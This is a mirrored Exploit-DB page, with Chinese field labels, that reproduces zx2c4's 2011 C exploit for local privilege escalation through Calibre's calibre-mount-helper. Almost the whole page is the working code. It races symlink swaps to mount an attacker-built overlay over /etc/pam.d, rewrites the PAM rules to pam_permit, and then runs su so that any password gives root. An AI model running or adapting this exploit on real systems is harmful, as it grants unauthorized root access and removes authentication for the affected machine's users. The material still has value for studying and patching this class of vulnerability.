Calibre E-Book Reader – Local Privilege Escalation (3)

  • 作者: zx2c4
    日期: 2011-11-05
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/18086/
  • /*
     * ########################################################
     * # .80 Calibrer Assault Mount #
     * # by zx2c4 #
     * ########################################################
     * 
     * Yesterday's assult mount used inotify to mount into /etc/pam.d. Today we
     * expand the attack by adding a race toggler so we can mount from non-block
     * devices.
     * 
     * Enjoy.
     * 
     * - zx2c4
     * 2011-11-4
     * 
     * greets to djrbliss
     * 
     */
    
    
    #include <stdio.h>
    #include <sys/inotify.h>
    #include <unistd.h>
    #include <stdlib.h>
    #include <signal.h>
    
    int main(int argc, char **argv)
    {
    	printf("########################################################\n");
    	printf("# .80 Calibrer Assault Mount #\n");
    	printf("# by zx2c4 #\n");
     	printf("########################################################\n\n");
    	
    	
    	printf("[+] Cleaning up old cruft.\n");
    	unlink("/dev/shm/overlay");
    	system("calibre-mount-helper cleanup /dev/ram0 /media/staging/");
    	
    	printf("[+] Creating overlay container.\n");
    	system("dd if=/dev/zero of=/dev/shm/overlay count=25600");
    	system("/usr/sbin/mkfs.ntfs /dev/shm/overlay");
    	
    	printf("[+] Mounting staging using race condition toggler...\n");
    	int childpid = fork();
    	if (childpid) {
    		int ret;
    		while ((ret = system("calibre-mount-helper mount /dev/shm/overlay /media/staging/ 2>&1")) == 256 || ret == 8192);
    		kill(childpid, SIGKILL);
    	} else {
    		while (1) {
    			rename("/dev/shm/overlay", "/dev/shm/overlay-holder");
    			symlink("/dev/ram0", "/dev/shm/overlay");
    			unlink("/dev/shm/overlay");
    			rename("/dev/shm/overlay-holder", "/dev/shm/overlay");
    		}
    		return 0;
    	}
    	
    	printf("[+] Preparing overlay with /etc/pam.d modification:\n");
    	system("cp -v /etc/pam.d/* /media/staging/");
    	system("sed -i \"s/pam_deny.so/pam_permit.so/g\" /media/staging/common-auth");
    	system("sed -i \"s/pam_cracklib.so.*/pam_permit.so/g\" /media/staging/system-auth");
    	system("sed -i \"s/pam_unix.so.*/pam_permit.so/g\" /media/staging/system-auth");
    	
    		
    	printf("[+] Mounting overlay over /etc/pam.d using race condition toggler and inotify...\n");
    	childpid = fork();
    	if (childpid) {
    		int childpid2 = fork();
    		if (childpid2) {
    			int ret;
    			while ((ret = system("calibre-mount-helper mount /dev/shm/overlay /etc/pam.d/ 2>&1")) == 256 || ret == 8192);
    			kill(childpid, SIGKILL);
    			kill(childpid2, SIGKILL);
    		} else {
    			while (1) {
    				int fd;
    				fd = inotify_init();
    				unlink("/media/staging/fake");
    				mkdir("/media/staging/fake");
    				inotify_add_watch(fd, "/media/staging/fake", IN_CREATE);
    				read(fd, 0, 0);
    				rename("/media/staging/fake", "/media/staging/tmp");
    				symlink("/etc/pam.d", "/media/staging/fake");
    				rmdir("/media/staging/tmp");
    				close(fd);
    			}
    		}
    	} else {
    		while (1) {
    			rename("/dev/shm/overlay", "/dev/shm/overlay-holder");
    			symlink("/dev/ram0", "/dev/shm/overlay");
    			unlink("/dev/shm/overlay");
    			rename("/dev/shm/overlay-holder", "/dev/shm/overlay");
    		}
    		return 0;
    	}
    	
    	printf("[+] Asking for root. When prompted for a password, type anything and press enter.\n");
    	system("su");
    	
    	return 0;
    }